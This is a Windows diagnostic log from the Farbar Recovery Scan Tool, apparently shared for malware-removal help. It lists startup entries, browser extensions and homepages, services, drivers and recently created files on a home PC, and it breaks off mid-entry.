C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9288408 2016-12-06] (Piriform Ltd) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [QuickenScheduledUpdates] => C:\Program Files (x86)\Quicken\bagent.exe [77216 2017-11-02] (Intuit Inc.) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [Uploader] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [127816 2015-07-15] (Seagate Technology LLC) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1421736 2017-03-28] (Garmin Ltd. or its subsidiaries) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AdobeCollabSync.exe [763000 2017-03-28] (Adobe Systems Incorporated) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\PhotoScreensaver.scr [570880 2017-07-11] (Microsoft Corporation) IFEO\AcroRd32.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\asav.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\dashboard.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\hotspot.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\lastpass.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\lpuninstall.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\turbotax.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass FF RunOnce.lnk [2016-01-21] ShortcutTarget: Install LastPass FF RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2016-01-21] ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{39b18a1c-5701-477d-9ff3-4fc1ef99d818}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{4fb4f4e8-d31d-4459-aeb2-9f787b0aea73}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://drudgereport.com/ hxxps://www.google.com/?gws_rd=ssl HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp SearchScopes: HKLM -> DefaultScope {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms} SearchScopes: HKLM -> {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms} SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> DefaultScope {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms} SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms} SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL = BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-11-10] (Microsoft Corporation) BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2016-01-21] (LastPass) BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.) BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-11-10] (Microsoft Corporation) BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-10-22] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\ssv.dll [2017-10-25] (Oracle Corporation) BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2016-01-21] (LastPass) BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.) BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-11-10] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\jp2ssv.dll [2017-10-25] (Oracle Corporation) Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2016-01-21] (LastPass) Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2016-01-21] (LastPass) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation) FireFox: ======== FF DefaultProfile: 9p71s5n4.default-1495840635264 FF ProfilePath: C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278 [2017-11-12] FF Homepage: Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278 -> hxxp://www.drudgereport.com/ hxxp://www.washingtontimes.com/ hxxp://www.realclearpolitics.com/index.html hxxp://www.newsmax.com/ hxxp://dailycaller.com/?refresh=true hxxps://mail.google.com/mail/u/0/?shva=1#inbox hxxps://calendar.google.com/calendar/render?tab=mc#g%7Cmonth-3+22844+22881+22857 FF Extension: (IBM Security Rapport) - C:\Users\Charlie\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\rapportext@trusteer.com.xpi [2017-11-10] FF Extension: (LastPass) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\support@lastpass.com [2016-12-17] FF Extension: (ColorfulTabs) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{0545b830-f0aa-4d7e-8820-50a4629a56fe} [2016-12-20] FF Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-12-16] FF Extension: (YouTube Flash Video Player) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{f3bd3dd2-2888-44c5-91a2-2caeb33fb898}.xpi [2016-12-28] FF ProfilePath: C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 [2017-11-13] FF Homepage: Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 -> hxxp://www.drudgereport.com/ hxxps://www.washingtontimes.com/ hxxps://www.realclearpolitics.com/index.html hxxps://mail.google.com/mail/u/0/?shva=1 hxxps://auth.weightwatchers.com/login/?goto=hxxp:%2F%2Fauth.weightwatchers.com%2Fopenam%2Foauth2%2Fauthorize%3Fresponse_type%3Did_token%26client_id%3DwebCMX%26scope%3Dopenid%2520session%26redirect_uri%3Dhttps%253A%252F%252Fcmx.weightwatchers.com%252Fauth%26nonce%3Db88927f21ca2121cd0066634fcf78dee%26state%3Dhttp%253A%252F%252Fcmx.weightwatchers.com%252F FF Extension: (Safe Browsing Version 4 (temporary add-on)) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\sbv4-gradual-rollout@mozilla.com.xpi [2017-11-08] FF Extension: (LastPass: Free Password Manager) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\support@lastpass.com [2017-10-21] FF Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-11-08] FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-01-27] [not signed] FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_27_0_0_183.dll [2017-10-25] () FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2016-01-21] (LastPass) FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll [No File] FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_183.dll [2017-10-25] () FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2011-11-30] (CANON INC.) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-09] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-09] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-10-25] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-10-25] (Oracle Corporation) FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2016-01-21] (LastPass) FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [No File] FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-10-22] (Microsoft Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-10-22] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Users\Charlie\AppData\Roaming\mozilla\plugins\npatgpc.dll [2014-08-05] (Cisco WebEx LLC) Chrome: ======= CHR DefaultProfile: Default CHR HomePage: Default -> mysearch.avg.com CHR StartupUrls: Default -> "hxxps://mail.google.com/mail/u/0/?shva=1#inbox" CHR DefaultSearchURL: Default -> hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&q={searchTerms} CHR DefaultSearchKeyword: Default -> hxxps://mysearch.avg.com CHR DefaultSuggestURL: Default -> hxxps://toolbar.avg.com/acp?q={searchTerms}&o=1 CHR Profile: C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default [2017-11-13] CHR Extension: (Slides) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-11-12] CHR Extension: (Docs) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-11-12] CHR Extension: (Google Drive) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-11-12] CHR Extension: (IBM Security Rapport) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbjllphbppobebmjpjcijfbakobcheof [2017-11-12] CHR Extension: (YouTube) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-11-12] CHR Extension: (Sheets) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-11-12] CHR Extension: (Google Docs Offline) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-11-12] CHR Extension: (LastPass: Free Password Manager) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-11-12] CHR Extension: (AVG SafePrice) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbckjcfnjmoiinpgddefodcighgikkgn [2017-11-12] CHR Extension: (Chrome Web Store Payments) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-11-12] CHR Extension: (Gmail) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-11-12] CHR Extension: (Chrome Media Router) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-12] CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [chfdnecihphmhljaaejmgoiahnihplgn] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S2 AVG Antivirus; C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe [282536 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 AVG Firewall; C:\Program Files (x86)\AVG\Antivirus\afwServ.exe [331952 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgbIDSAgent; C:\Program Files (x86)\AVG\Antivirus\x64\aswidsagenta.exe [7496672 2017-10-20] (AVG Technologies CZ, s.r.o.) S2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1428656 2017-10-31] (AVG Technologies CZ, s.r.o.) S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8063656 2017-10-31] (Microsoft Corporation) S2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\DCCService.exe [130936 2017-09-19] (Dell Inc.) S2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell) S2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2571352 2016-01-05] (Dell Inc.) S2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [230248 2017-05-01] (Dell Inc.) S2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [1099280 2017-03-28] (Garmin Ltd. or its subsidiaries) S2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [14696 2013-07-30] (Intel Corporation) S2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382456 2017-03-13] (Intel Corporation) S2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed] S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation) S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-09] (Intel Corporation) S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6058960 2017-08-21] (Malwarebytes) S2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [50688 2015-10-30] (HP Inc.) [File not signed] S2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [66048 2015-10-30] (HP Inc.) [File not signed] S2 RapportMgmtService; C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe [2350064 2017-09-28] (IBM Corp.) S4 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [312056 2015-08-04] (Realtek Semiconductor) S4 Seagate Dashboard Services; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16216 2015-07-15] (Seagate Technology LLC) S4 Seagate MobileBackup Service; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [143656 2015-07-15] (Seagate Technology LLC) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-18] (Microsoft Corporation) S4 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [2065808 2016-01-04] (SoftThinks SAS) S4 SupportAssistAgent; C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [31928 2016-04-22] (Dell Inc.) S2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [5906704 2017-07-26] (AVG Technologies CZ, s.r.o.) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-07-11] (Microsoft Corporation) S4 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2014-05-13] (Atheros) [File not signed] ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 athr; C:\WINDOWS\System32\drivers\athw10x.sys [4599728 2017-02-22] (Qualcomm Atheros Communications, Inc.) S3 avgbdisk; C:\WINDOWS\system32\drivers\avgbdiska.sys [166624 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgbidsdriver; C:\WINDOWS\system32\drivers\avgbidsdrivera.sys [314640 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgbidsh; C:\WINDOWS\system32\drivers\avgbidsha.sys [192584 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgblog; C:\WINDOWS\system32\drivers\avgbloga.sys [336896 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgbuniv; C:\WINDOWS\system32\drivers\avgbuniva.sys [51336 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgHwid; C:\WINDOWS\system32\drivers\avgHwid.sys [39424 2017-10-20] (AVG Technologies CZ, s.r.o.) S2 avgMonFlt; C:\WINDOWS\system32\drivers\avgMonFlt.sys [140192 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgNetSec; C:\WINDOWS\system32\drivers\avgNetSec.sys [548568 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgRdr; C:\WINDOWS\system32\drivers\avgRdr2.sys [102792 2017-10-20] (AVG Technologies CZ, s.r.o.) S0 avgRvrt; C:\WINDOWS\system32\drivers\avgRvrt.sys [76832 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgSnx; C:\WINDOWS\system32\drivers\avgSnx.sys [1022288 2017-10-26] (AVG Technologies CZ, s.r.o.) S1 avgSP; C:\WINDOWS\system32\drivers\avgSP.sys [579584 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgStm; C:\WINDOWS\system32\drivers\avgStm.sys [193768 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgVmm; C:\WINDOWS\system32\drivers\avgVmm.sys [355856 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [32464 2016-01-05] (Dell Computer Corporation) S3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [24240 2016-01-05] (Dell Computer Corporation) R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [146856 2013-06-04] (Windows (R) Win 7 DDK provider) S3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [21928 2013-06-04] (Windows (R) Win 7 DDK provider) S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [33448 2016-12-07] () S3 epmntdrv; C:\WINDOWS\SysWOW64\epmntdrv.sys [21496 2016-01-14] () S1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-10-07] () S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [10848 2016-07-11] () [File not signed] S3 EuGdiDrv; C:\WINDOWS\SysWOW64\EuGdiDrv.sys [10208 2016-07-11] () [File not signed] S2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [192952 2017-10-07] (Malwarebytes) S3 MBAMFarflt; C:\WINDOWS\system32\DRIVERS\farflt.sys [110016 2017-11-12] (Malwarebytes) S3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [45504 2017-11-12] (Malwarebytes) S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [252232 2017-11-12] (Malwarebytes) S3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [94144 2017-11-13] (Malwarebytes) R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation) S1 RapportAegle64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportAegle64.sys [384312 2017-09-28] (IBM Corp.) S1 RapportCerberus_1804077; C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus64_1804077.sys [1271448 2017-10-01] (IBM Corp.) S1 RapportEI64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportEI64.sys [585432 2017-09-28] (IBM Corp.) S0 RapportHades64; C:\WINDOWS\System32\Drivers\RapportHades64.sys [253912 2017-09-28] (IBM Corp.) S0 RapportKE64; C:\WINDOWS\System32\Drivers\RapportKE64.sys [507960 2017-09-28] (IBM Corp.) S1 RapportPG64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportPG64.sys [610616 2017-09-28] (IBM Corp.) R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [896752 2016-12-15] (Realtek ) R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2015-06-10] (Realsil Semiconductor Corporation) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-11-12] () S3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-06-01] (AVG Netherlands B.V.) S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) U3 idsvc; no ImagePath ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-11-12 21:10 - 2017-11-12 21:10 - 000028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys 2017-11-12 21:09 - 2017-11-12 21:45 - 000000000 ____D C:\ProgramData\RogueKiller 2017-11-12 20:53 - 2017-11-12 20:54 - 026828360 _____ (Adlice Software) C:\Users\Charlie\Desktop\RogueKiller_portable64.exe 2017-11-12 20:52 - 2017-11-12 20:52 - 008261584 _____ (Malwarebytes) C:\Users\Charlie\Desktop\AdwCleaner.exe 2017-11-12 20:47 - 2017-11-12 20:47 - 000001940 _____ C:\Users\Charlie\Desktop\next steps.txt 2017-11-12 20:35 - 2017-11-12 20:35 - 000043066 _____ C:\Users\Charlie\Downloads\20171102_BANK_credit_card_8821.pdf 2017-11-11 19:19 - 2017-11-11 19:19 - 000004211 _____ C:\Users\Charlie\Downloads\google(2).csv 2017-11-10 16:13 - 2017-11-13 09:28 - 000027829 _____ C:\Users\Charlie\Desktop\FRST.txt 2017-11-10 16:13 - 2017-11-13 09:27 - 000000000 ____D C:\FRST 2017-11-10 16:12 - 2017-11-13 09:26 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2017-11-10 16:11 - 2017-11-13 09:27 - 000439556 _____ C:\WINDOWS\ntbtlog.txt 2017-11-10 14:41 - 2017-11-12 17:02 - 002392576 _____ (Farbar) C:\Users\Charlie\Desktop\FRST64.exe 2017-11-03 10:07 - 2017-11-03 10:07 - 001434164 _____ C:\Users\Charlie\Downloads\PubsHandler.ashx 2017-10-30 16:04 - 2017-10-30 16:11 - 007791398 _____ C:\Users\Charlie\Documents\IMG_20171030_0001.pdf 2017-10-25 20:38 - 2017-10-25 20:38 - 000389384 _____ 